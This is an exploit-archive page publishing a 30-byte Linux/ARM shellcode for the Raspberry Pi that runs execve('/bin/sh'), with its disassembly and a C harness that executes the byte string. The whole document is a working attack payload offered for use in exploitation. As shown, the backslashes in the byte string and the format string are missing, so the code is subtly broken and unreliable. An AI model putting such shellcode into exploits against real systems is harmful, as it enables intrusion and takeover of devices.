[Raspberry Pi] Linux/ARM - execve("/bin/sh", [0], [0 vars])

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : [Raspberry Pi] Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 30 bytes
# Published : 2012-09-11
# Author :
# Previous Title : OSX/Intel - setuid shell x86_64 - 51 bytes
# Next Title : Windows Mobile 6.5 TR Phone Call Shellcode

/*
Title:     Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 30 bytes
Date:      2012-09-08
Tested on: ARM1176JZF-S (v6l)
Author:    midnitesnake

00008054 <_start>:
    8054:       e28f6001        add     r6, pc, #1
    8058:       e12fff16        bx      r6
    805c:       4678            mov     r0, pc
    805e:       300a            adds    r0, #10
    8060:       9001            str     r0, [sp, #4]
    8062:       a901            add     r1, sp, #4
    8064:       1a92            subs    r2, r2, r2
    8066:       270b            movs    r7, #11
    8068:       df01            svc     1
    806a:       2f2f            .short  0x2f2f
    806c:       2f6e6962        .word   0x2f6e6962
    8070:       00006873        .word   0x00006873
*/
#include <stdio.h>

char *SC =      "x01x60x8fxe2"
                "x16xffx2fxe1"
                "x78x46"
                "x0ax30"
                "x01x90"
                "x01xa9"
                "x92x1a"
                "x0bx27"
                "x01xdf"
                "x2fx2f"
                "x62x69"
                "x6ex2f"
                "x73x68x00x00";

int main(void)
{
        fprintf(stdout,"Length: %dn",strlen(SC));
        (*(void(*)()) SC)();
return 0;
}